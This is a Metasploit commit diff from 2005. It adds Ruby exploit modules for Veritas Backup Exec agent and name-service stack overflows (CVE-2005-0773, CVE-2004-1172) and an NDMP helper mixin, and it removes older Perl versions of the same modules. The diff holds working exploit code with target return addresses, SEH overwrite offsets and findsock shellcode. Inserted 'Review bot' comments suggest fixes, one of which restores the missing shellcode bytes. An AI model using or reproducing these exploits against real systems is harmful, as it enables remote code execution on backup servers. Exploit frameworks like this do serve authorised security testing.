Bug fixes for alphanum vs alphanumeric

Added some target print code to the brightstor exploits
Added the backupexec exploits


git-svn-id: file:///home/svn/incoming/trunk@3132 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2005-11-27 01:51:50 +00:00
parent af19802cc0
commit 7624b4d78a
14 changed files with 419 additions and 526 deletions


@ -1,272 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Veritas Backup Exec Windows Remote Agent Overflow',
'Description' => %q{
This module exploits a stack overflow in the Veritas
BackupExec Windows Agent software. This vulnerability occurs
when a client authentication request is received with type
'3' and a long password argument. Reliable execution is
obtained by abusing the stack overflow to smash a SEH
pointer.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2005-0773'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities'],
[ 'URL', 'http://seer.support.veritas.com/docs/276604.htm'],
[ 'MIL', '9'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'win32, winnt, win2000, winxp, win2003',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => '',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::backupexec_agent;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Veritas Backup Exec Windows Remote Agent Overflow',
'Version' => '$Revision$',
'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003' ],
'Priv' => 1,
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 10000],
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'Keys' => ['+ws2ord'],
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the Veritas BackupExec Windows
Agent software. This vulnerability occurs when a client authentication request
is received with type '3' and a long password argument. Reliable execution is
obtained by abusing the stack overflow to smash a SEH pointer.
}),
'Refs' =>
[
['CVE', '2005-0773' ],
['URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities'],
['URL', 'http://seer.support.veritas.com/docs/276604.htm' ],
['MIL', '9'],
],
'DefaultTarget' => 0,
'Targets' =>
[
['Veritas BE 9.0/9.1/10.0 (All Windows)', 0x0140f8d5, 0x014261b0 ],
['Veritas BE 9.0/9.1/10.0 (Windows 2000)', 0x75022ac4, 0x75022ac4 ],
],
'Keys' => ['veritas'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
# Version 4.2 -> 9.1
# Version 5.1 -> 10.0
sub Check {
my $self = shift;
my ($vend, $prod, $vers) = $self->GetVersion;
if (! $vend) {
$self->PrintLine("[*] Could not determine the version number");
return $self->CheckCode('Unknown');
}
$self->PrintLine("[*] $prod Version $vers ($vend)");
return $self->CheckCode('Detected');
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
$self->PrintLine( "[*] Attempting to exploit " . $target->[0] );
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ( $s->IsError ) {
$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
return;
}
my $res = $s->Recv(4, 5);
$res = $s->Recv(unpack('N', $res) - 0x80000000, 5);
my $username = "X" x 512;
my $password = Pex::Text::PatternCreate(8192);
# Place our payload early in the request and jump backwards into it
substr($password, 3536-length($shellcode), length($shellcode), $shellcode);
# This offset is required for version 10.0
substr($password, 3536, 2, "\xeb\x06");
substr($password, 3540, 4, pack('V', $target->[2]) );
substr($password, 3544, 5, "\xe9" . pack('V', -1037));
# This offset is required for version 9.0/9.1
substr($password, 4524, 2, "\xeb\x06");
substr($password, 4528, 4, pack('V', $target->[1]) );
substr($password, 4532, 5, "\xe9" . pack('V', -2025));
my $conn_auth =
pack('N', 1). # Sequence number
pack('N', time()). # Current time
pack('N', 0). # Message type (request)
pack('N', 0x901). # Message name (connect_client_auth)
pack('N', 0). # Reply sequence number
pack('N', 0). # Error status
pack('N', 3). # Authentication type
pack('N', length($username)).
$username.
pack('N', length($password)).
$password.
pack('N', 4);
$self->PrintLine( "[*] Sending authentication request of " . length($conn_auth) . " bytes..." );
$s->Send(pack('N', 0x80000000 + length($conn_auth)) . $conn_auth);
return;
}
sub GetVersion {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ( $s->IsError ) {
$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
return undef;
}
my $res = $s->Recv(4, 5);
return undef if ! $res;
$res = $s->Recv(unpack('N', $res) - 0x80000000, 5);
my $serv_info =
pack('N', 1). # Sequence number
pack('N', time()). # Current time
pack('N', 0). # Message type (request)
pack('N', 0x108). # Message name (connect_client_auth)
pack('N', 0). # Reply sequence number
pack('N', 0); # Error status
$s->Send(pack('N', 0x80000000 + length($serv_info)) . $serv_info);
$res = $s->Recv(4, 5);
return undef if ! $res;
$res = $s->Recv(unpack('N', $res) - 0x80000000, 5);
$s->Close;
# Skip past the protocols headers
$res = substr($res, 28);
# Vendor
my $vend_len = unpack('N', substr($res, 0, 4));
my $vend = substr($res, 4, $vend_len);
$res = substr($res, 4 + $vend_len + 1);
# Product
my $prod_len = unpack('N', substr($res, 0, 4));
my $prod = substr($res, 4, $prod_len);
$res = substr($res, 4 + $prod_len + 1);
# Version
my $vers_len = unpack('N', substr($res, 0, 4));
my $vers = substr($res, 4, $vers_len);
$res = substr($res, 4 + $vers_len + 1);
return ($vend, $prod, $vers);
}
1;
=end
end
end


@ -1,243 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Veritas Backup Exec Name Service Overflow',
'Description' => %q{
This module exploits a vulnerability in the Veritas Backup
Exec Agent Browser service. This vulnerability occurs when a
recv() call has a length value too long for the destination
stack buffer. By sending an agent name value of 63 bytes or
more, we can overwrite the return address of the recv
function. Since we only have ~60 bytes of contiguous space
for shellcode, a tiny findsock payload is sent which uses a
hardcoded IAT address for the recv() function. This payload
will then roll the stack back to the beginning of the page,
recv() the real shellcode into it, and jump to it. This
module has been tested against Veritas 9.1 SP0, 9.1 SP1, and
8.6.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '12418'],
[ 'CVE', '2004-1172'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],
[ 'MIL', '10'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "",
'MinNops' => 512,
'MinNops' => 512,
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'win32, win2000, winxp, win2003',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => 'Dec 16 2004',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::backupexec_ns;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Veritas Backup Exec Name Service Overflow',
'Version' => '$Revision$',
'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],
'Priv' => 1,
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 6101],
},
'Payload' =>
{
'MinNops' => 512,
'MaxNops' => 512,
'Space' => 1024,
'BadChars' => '',
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a vulnerability in the Veritas Backup Exec
Agent Browser service. This vulnerability occurs when a recv() call
has a length value too long for the destination stack buffer. By
sending an agent name value of 63 bytes or more, we can overwrite
the return address of the recv function. Since we only have ~60
bytes of contiguous space for shellcode, a tiny findsock payload
is sent which uses a hardcoded IAT address for the recv() function.
This payload will then roll the stack back to the beginning of
the page, recv() the real shellcode into it, and jump to it.
This module has been tested against Veritas 9.1 SP0, 9.1 SP1,
and 8.6.
}),
'Refs' =>
[
['OSVDB', '12418'],
['CVE', '2004-1172'],
['URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],
['MIL', '10'],
],
'Targets' =>
[ # BackupExec 9.1 SP0/SP1 return contributed by class101
['Veritas BE 9.1 SP0/SP1', 0x0142ffa1, 0x401150FF], # recv@bnetns.exe v9.1.4691.0 | esi@bnetns.exe
['Veritas BE 8.5 ', 0x014308b9, 0x401138FF], # recv@bnetns.exe v8.50.3572 | esi@beclass.dll v8.50.3572
],
'Keys' => ['veritas'],
'DisclosureDate' => 'Dec 16 2004',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
$self->PrintLine( "[*] Attempting to exploit " . $target->[0] );
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ( $s->IsError ) {
$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
return;
}
my $code = "\xfc" x 112;
# This will findsock/read the real shellcode (51 bytes, harcoded IAT for recv)
# The IAT for recv() is for bnetns, the address is shifted by 8 bits to avoid
# nulls: [0x00401150 -> 0x401150FF]
my $read =
"\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74".
"\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11".
"\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75".
"\xe1\xff\xd7";
# Configure the IAT for the recv call
substr($read, 29, 4, pack('V', $target->[2]));
# Stuff it all into the request...
substr( $code, 2, length($read), $read );
# Return address to use (jmp esi)
substr( $code, 66, 4, pack('V', $target->[1]) );
# The registration request
my $req =
"\x02\x00\x32\x00\x20\x00" . $code . "\x00".
"1.1.1.1.1.1\x00".
"\xeb\x81";
$self->PrintLine( "[*] Sending agent registration request of " . length($req) . " bytes..." );
$s->Send($req);
$self->PrintLine( "[*] Sending final payload of " . length($req) . " bytes..." );
$s->Send($shellcode);
sleep(2);
$self->PrintLine("[*] Waiting for a response...");
return;
}
my $findsock = q{
00000000 31F6 xor esi,esi
00000002 C1EC0C shr esp,0xc
00000005 C1E40C shl esp,0xc
00000008 89E7 mov edi,esp
0000000A 89FB mov ebx,edi
0000000C 6A01 push byte +0x1
0000000E 8B7424FE mov esi,[esp-0x2]
00000012 31D2 xor edx,edx
00000014 52 push edx
00000015 42 inc edx
00000016 C1E210 shl edx,0x10
00000019 52 push edx
0000001A 57 push edi
0000001B 56 push esi
0000001C B8FF501140 mov eax,0x401150ff
00000021 C1E808 shr eax,0x8
00000024 FF10 call near [eax]
00000026 85C0 test eax,eax
00000028 7907 jns 0x31
0000002A 89DC mov esp,ebx
0000002C 4E dec esi
0000002D 85F6 test esi,esi
0000002F 75E1 jnz 0x12
00000031 FFD7 call edi
};
1;
=end
end
end


@ -213,7 +213,8 @@ class Exploit < Msf::Module
require 'msf/core/exploit/dcerpc'
require 'msf/core/exploit/mssql'
require 'msf/core/exploit/arkeia'
require 'msf/core/exploit/ndmp'
#
# Creates an instance of the exploit module. Mad skillz.
#


@ -28,6 +28,14 @@ module Exploit::Remote::Arkeia
end
#
# Flush the receive buffer on a new connection
#
def connect
super
self.recv_buff = ''
end
#
# This method dumps some information about the service
#
@ -38,7 +46,8 @@ module Exploit::Remote::Arkeia
resp = ''
# Authenticate1
req = "\x00\x41\x00\x00\x00\x00\x00\x73"+
req =
"\x00\x41\x00\x00\x00\x00\x00\x73"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x7f\x00\x00\x01"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
@ -63,7 +72,8 @@ module Exploit::Remote::Arkeia
end
# Authenticate2
req = "\x00\x73\x00\x00\x00\x00\x00\x0c" +
req =
"\x00\x73\x00\x00\x00\x00\x00\x0c" +
"\x32\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00"
@ -75,7 +85,8 @@ module Exploit::Remote::Arkeia
end
# SessionSetup1
req = "\x00\x61\x00\x04\x00\x01\x00\x15"+
req =
"\x00\x61\x00\x04\x00\x01\x00\x15"+
"\x00\x00\x31\x35\x33\x39\x38\x00"+
"\x45\x4e\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00"
@ -88,7 +99,8 @@ module Exploit::Remote::Arkeia
end
# Begin the ARKADMIN_GET_CLIENT_INFO request
req = "\x00\x62\x00\x01\x00\x02\x00\x25"+
req =
"\x00\x62\x00\x01\x00\x02\x00\x25"+
"\x41\x52\x4b\x41\x44\x4d\x49\x4e"+
"\x5f\x47\x45\x54\x5f\x43\x4c\x49"+
"\x45\x4e\x54\x5f\x49\x4e\x46\x4f"+
@ -103,7 +115,8 @@ module Exploit::Remote::Arkeia
end
# Complete the ARKADMIN_GET_CLIENT_INFO request
req = "\x00\x63\x00\x04\x00\x03\x00\x11"+
req =
"\x00\x63\x00\x04\x00\x03\x00\x11"+
"\x30\x00\x31\x00\x32\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00"
@ -129,7 +142,8 @@ module Exploit::Remote::Arkeia
info['Hostname'] = mver[1] if mver
# Begin the ARKADMIN_GET_MACHINE_INFO request
req = "\x00\x62\x00\x01\x00\x02\x00\x26"+
req =
"\x00\x62\x00\x01\x00\x02\x00\x26"+
"\x41\x52\x4b\x41\x44\x4d\x49\x4e"+
"\x5f\x47\x45\x54\x5f\x4d\x41\x43"+
"\x48\x49\x4e\x45\x5f\x49\x4e\x46"+
@ -148,7 +162,8 @@ module Exploit::Remote::Arkeia
end
# Complete the ARKADMIN_GET_MACHINE_INFO request
req = "\x00\x63\x00\x04\x00\x03\x00\x11"+
req =
"\x00\x63\x00\x04\x00\x03\x00\x11"+
"\x30\x00\x31\x00\x33\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00"
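Review bot: The new `connect` override in Exploit::Remote::Arkeia declares no parameters and returns the value of the assignment, so it rejects any arguments the underlying Tcp#connect accepts (an `ArgumentError` on a call such as `connect(false)`, if that is the signature the mixin offers — its definition is outside this hunk) and hands back `''` instead of whatever socket the parent returns. Forward and return explicitly: `def connect(*args)`, `nsock = super(*args)`, and `nsock` as the last line after `self.recv_buff = ''`. The remaining hunks in this file only reflow the `req =` literals onto a second line.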


@ -0,0 +1,118 @@
require 'msf/core'
module Msf
###
#
# This module exposes methods for accessing NDMP services
#
###
module Exploit::Remote::NDMP
include Exploit::Remote::Tcp
#
# Creates an instance of a MSSQL exploit module.
#
def initialize(info = {})
super
# Register the options that all FTP exploits may make use of.
register_options(
[
Opt::RHOST,
Opt::RPORT(10000),
], Msf::Exploit::Remote::NDMP)
self.recv_buff = ''
end
#
# Flush the receive buffer on a new connection
#
def connect
super
self.recv_buff = ''
end
#
# This method dumps ndmp version information
#
def ndmp_info
connect
req = [
1, # Sequence number
Time.now.to_i, # Current time
0, # Message type (request)
0x108, # Message name (version)
0, # Reply sequence number
0, # Error status
].pack('NNNNNN')
resp = ndmp_recv()
ndmp_send(req)
resp = ndmp_recv()
disconnect
if (not (resp and resp.length > 28))
return false
end
info = { }
i = 32
vend_len = resp[i, 4].unpack('N')[0]
vend = resp[i + 4, vend_len]
i += vend_len + 4 + 1
prod_len = resp[i, 4].unpack('N')[0]
prod = resp[i + 4, prod_len]
i += prod_len + 4 + 1
vers_len = resp[i, 4].unpack('N')[0]
vers = resp[i + 4, vers_len]
i += vers_len + 4 + 1
info['Version'] = vers
info['Product'] = prod
info['Vendor'] = vend
return info
end
#
# This method reads from the socket and parses out a single
# NDMP response, buffering the rest
#
def ndmp_recv(nsock = self.sock)
if (self.recv_buff.length < 4)
self.recv_buff << (sock.get_once || '')
end
if (self.recv_buff.length < 4)
return false
end
# Read the length header out of the message
dlen = self.recv_buff[0, 4].unpack('N')[0] & 0x7fffffff
# Do we have the entire response message?
if (self.recv_buff.length >= dlen + 4)
return self.recv_buff.slice!(0, dlen + 4)
end
return false
end
#
# This method tacks a length header on a packet then sends
# it out the socket
#
def ndmp_send(data, nsock = self.sock)
nsock.put( [ data.length + 0x80000000 ].pack('N') + data )
end
attr_accessor :recv_buff
end
end
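Review bot: ndmp_info trusts the length fields it pulls out of the NDMP reply: the guard `resp.length > 28` does not even cover the first read at offset 32, and vend_len, prod_len and vers_len are used as slice lengths and offsets without ever being compared to what is buffered, so a short or hostile reply makes the next `resp[i, 4].unpack('N')` operate on nil and raise instead of returning false. The rewrite below bounds every field against `resp.length` before slicing and keeps the rest of the method as it is. Separately, ndmp_recv reads from `sock` and ignores its `nsock` parameter, and the header comments copied from sibling mixins (`Creates an instance of a MSSQL exploit module`, `all FTP exploits`) should describe NDMP.
```ruby
		# … unchanged: connect, request construction, ndmp_recv/ndmp_send, disconnect …
		if (not (resp and resp.length >= 36))
			return false
		end
		info = { }
		i = 32
		# Each field is a 4-byte big-endian length, the bytes, then a pad byte.
		# The lengths come off the wire, so bound them before slicing.
		['Vendor', 'Product', 'Version'].each do |key|
			return false if (resp.length < i + 4)
			flen = resp[i, 4].unpack('N')[0]
			return false if (resp.length < i + 4 + flen)
			info[key] = resp[i + 4, flen]
			i += flen + 4 + 1
		end
		return info
```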


@ -81,6 +81,9 @@ class Exploits::Windows::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
def exploit
connect
print_status("Trying target #{target.name}...")
head = "\x00\x4d\x00\x03\x00\x01\xff\xff"
data = (target['Rets'][1] == 5) ? prep_ark5() : prep_ark4()
head[6, 2] = [data.length].pack('n')


@ -0,0 +1,126 @@
require 'msf/core'
module Msf
class Exploits::Windows::Backupexec::BackupExecAgentOverflow < Msf::Exploit::Remote
include Exploit::Remote::NDMP
def initialize(info = {})
super(update_info(info,
'Name' => 'Veritas Backup Exec Windows Remote Agent Overflow',
'Description' => %q{
This module exploits a stack overflow in the Veritas
BackupExec Windows Agent software. This vulnerability occurs
when a client authentication request is received with type
'3' and a long password argument. Reliable execution is
obtained by abusing the stack overflow to smash a SEH
pointer.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2005-0773'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities'],
[ 'URL', 'http://seer.support.veritas.com/docs/276604.htm'],
[ 'MIL', '9'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[
'Veritas BE 9.0/9.1/10.0 (All Windows)',
{
'Platform' => 'win',
'Rets' => [ 0x0140f8d5, 0x014261b0 ],
},
],
[
'Veritas BE 9.0/9.1/10.0 (Windows 2000)',
{
'Platform' => 'win',
'Rets' => [ 0x75022ac4, 0x75022ac4 ],
},
],
],
'DisclosureDate' => '',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(10000)
], self)
end
def check
info = ndmp_info()
if (info and info['Version'])
print_status(" Vendor: #{info['Vendor']}")
print_status("Product: #{info['Product']}")
print_status("Version: #{info['Version']}")
if (info['Vendor'] =~ /VERITAS/i and info['Version'] =~ /^(4\.2|5\.1)$/)
return Exploit::CheckCode::Detected
end
end
return Exploit::CheckCode::Safe
end
def exploit
connect
print_status("Trying target #{target.name}...")
resp = ndmp_recv()
username = 'X' * 512
password = Rex::Text.rand_text_alphanumeric(8192)
# Place our payload early in the request and jump backwards into it
password[ 3536 - payload.encoded.length, payload.encoded.length] = payload.encoded
# This offset is required for version 10.0
password[3536, 2] = "\xeb\x06"
password[3540, 4] = [ target['Rets'][1] ].pack('V')
password[3544, 5] = "\xe9" + [-1037].pack('V')
# This offset is required for version 9.0/9.1
password[4524, 2] = "\xeb\x06"
password[4528, 4] = [ target['Rets'][0] ].pack('V')
password[4532, 5] = "\xe9" + [-2025].pack('V')
# Create the authentication request
auth = [
1, # Sequence number
Time.now.to_i, # Current time
0, # Message type (request)
0x901, # Message name (connect_client_auth)
0, # Reply sequence number
0, # Error status
3 # Authentication type
].pack('NNNNNNN') +
[ username.length ].pack('N') + username +
[ password.length ].pack('N') + password +
[ 4 ].pack('N')
print_status("Sending authentication request...")
ndmp_send(auth)
handler
disconnect
end
end
end
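Review bot: check() reports CheckCode::Safe whenever ndmp_info returns false, so a refused connection, a non-NDMP listener or a truncated banner are all presented as "not vulnerable"; the Perl module this replaces returned an 'Unknown' code in exactly that case. Add `return Exploit::CheckCode::Unknown if (not info)` (or whichever code the framework uses for an undetermined result) ahead of the version match, and keep Safe for hosts that did identify themselves with a non-matching version. `'DisclosureDate' => ''` is also left empty; the referenced iDefense/Veritas advisories should supply the date.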


@ -0,0 +1,137 @@
require 'msf/core'
module Msf
class Exploits::Windows::Backupexec::BackupExecNSOverflow < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Veritas Backup Exec Name Service Overflow',
'Description' => %q{
This module exploits a vulnerability in the Veritas Backup
Exec Agent Browser service. This vulnerability occurs when a
recv() call has a length value too long for the destination
stack buffer. By sending an agent name value of 63 bytes or
more, we can overwrite the return address of the recv
function. Since we only have ~60 bytes of contiguous space
for shellcode, a tiny findsock payload is sent which uses a
hardcoded IAT address for the recv() function. This payload
will then roll the stack back to the beginning of the page,
recv() the real shellcode into it, and jump to it. This
module has been tested against Veritas 9.1 SP0, 9.1 SP1, and
8.6.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '12418'],
[ 'CVE', '2004-1172'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],
[ 'MIL', '10'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'MinNops' => 512,
'MinNops' => 512,
'StackAdjustment' => -3500,
},
'Targets' =>
[
[
'Veritas BE 9.1 SP0/SP1', # BackupExec 9.1 SP0/SP1 return contributed by class101
{
'Platform' => 'win',
'Rets' => [ 0x0142ffa1, 0x401150FF ], # recv@bnetns.exe v9.1.4691.0 | esi@bnetns.exe
},
],
[
'Veritas BE 8.5',
{
'Platform' => 'win',
'Rets' => [ 0x014308b9, 0x401138FF ], # recv@bnetns.exe v8.50.3572 | esi@beclass.dll v8.50.3572
},
],
],
'DisclosureDate' => 'Dec 16 2004',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(6101)
], self)
end
def exploit
connect
print_status("Trying target #{target.name}...")
# This will findsock/read the real shellcode (51 bytes, harcoded IAT for recv)
# The IAT for recv() is for bnetns, the address is shifted by 8 bits to avoid
# nulls: [0x00401150 -> 0x401150FF]
stage_code = "\xfc" * 112
stage_read =
"\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74"+
"\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11"+
"\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75"
# Configure the IAT for the recv call
stage_read[29, 4] = [ target['Rets'][1] ].pack('V')
# Stuff it all into one request
stage_code[2, stage_read.length] = stage_read
# Create the registration request
req =
"\x02\x00\x32\x00\x20\x00" + stage_code + "\x00"+
"1.1.1.1.1.1\x00" + "\xeb\x81"
print_status("Sending the agent registration request of #{req.length.to_s} bytes...")
sock.put(req)
print_status("Sending the payload stage down the socket...")
sock.put(payload.encoded)
print_status("Waiting for the payload to execute...")
select(nil, nil, nil, 2)
handler
disconnect
end
end
end
__END__
[ findsock stage ]
00000000 31F6 xor esi,esi
00000002 C1EC0C shr esp,0xc
00000005 C1E40C shl esp,0xc
00000008 89E7 mov edi,esp
0000000A 89FB mov ebx,edi
0000000C 6A01 push byte +0x1
0000000E 8B7424FE mov esi,[esp-0x2]
00000012 31D2 xor edx,edx
00000014 52 push edx
00000015 42 inc edx
00000016 C1E210 shl edx,0x10
00000019 52 push edx
0000001A 57 push edi
0000001B 56 push esi
0000001C B8FF501140 mov eax,0x401150ff
00000021 C1E808 shr eax,0x8
00000024 FF10 call near [eax]
00000026 85C0 test eax,eax
00000028 7907 jns 0x31
0000002A 89DC mov esp,ebx
0000002C 4E dec esi
0000002D 85F6 test esi,esi
0000002F 75E1 jnz 0x12
00000031 FFD7 call edi
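Review bot: The findsock stage in `stage_read` is truncated: the literal ends at `"\x85\xf6\x75"`, dropping the `\xe1\xff\xd7` tail that both the Perl module being replaced and the disassembly under `__END__` show (the jnz displacement at 0x2f and `call edi` at 0x31, 51 bytes as the comment above it says). When the 48 bytes are written into `stage_code` the missing positions are the `\xfc` filler, so the jnz gets a -4 displacement and nothing ever calls into the received payload; append `"\xe1\xff\xd7"` as a fourth line of the literal. The Payload hash also lists `'MinNops' => 512` twice where the original had `'MaxNops' => 512` as the second entry, so the upper NOP bound is silently dropped by the duplicate key.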


@ -95,6 +95,8 @@ class Exploits::Windows::Brightstor::BrightstorDiscoTcp < Msf::Exploit::Remote
def exploit
connect
print_status("Trying target #{target.name}...")
buf = Rex::Text.rand_text_english(4096)
# Overwriting the return address works well, but the only register


@ -93,6 +93,8 @@ class Exploits::Windows::Brightstor::BrightstorDiscoUdp < Msf::Exploit::Remote
def exploit
connect_udp
print_status("Trying target #{target.name}...")
buf = 'X' * 4096
# esp @ 971


@ -62,6 +62,8 @@ class Exploits::Windows::Brightstor::BrightstorSQLAgentOverflow < Msf::Exploit::
def exploit
print_status("Trying target #{target.name}...")
# The 'one line' request does not work against Windows 2003
1.to(5) { |i|


@ -72,7 +72,9 @@ class Exploits::Windows::Brightstor::BrightstorUniversalAgentOverflow < Msf::Exp
end
def exploit
print_status("Trying target #{target.name}...")
# The server reverses four bytes starting at offset 0xa5 :0
# Create the overflow string


@ -61,7 +61,7 @@ class Exploits::Windows::Ftp::WSFTPDMKDOverflow < Msf::Exploit::Remote
print_status("Trying target #{target.name}...")
buf = Rex::Text.rand_text_alphanum(8192)
buf = Rex::Text.rand_text_alphanumeric(8192)
buf[498, 4] = [ 0x7ffd3001 ].pack('V')
buf[514, 4] = [ target.ret ].pack('V')
buf[518, 4] = [ target.ret ].pack('V')


@ -129,7 +129,7 @@ class Exploits::Windows::Ssl::MS04_011_PCT < Msf::Exploit::Remote
if (datastore['PROTO'] == 'smtp')
greeting = sock.get_once
sock.put('HELO ' + (Rex::Text.rand_text_alphanum(rand(10)+1)) + "\r\n")
sock.put('HELO ' + (Rex::Text.rand_text_alphanumeric(rand(10)+1)) + "\r\n")
resp = sock.get_once
sock.put("STARTTLS\r\n")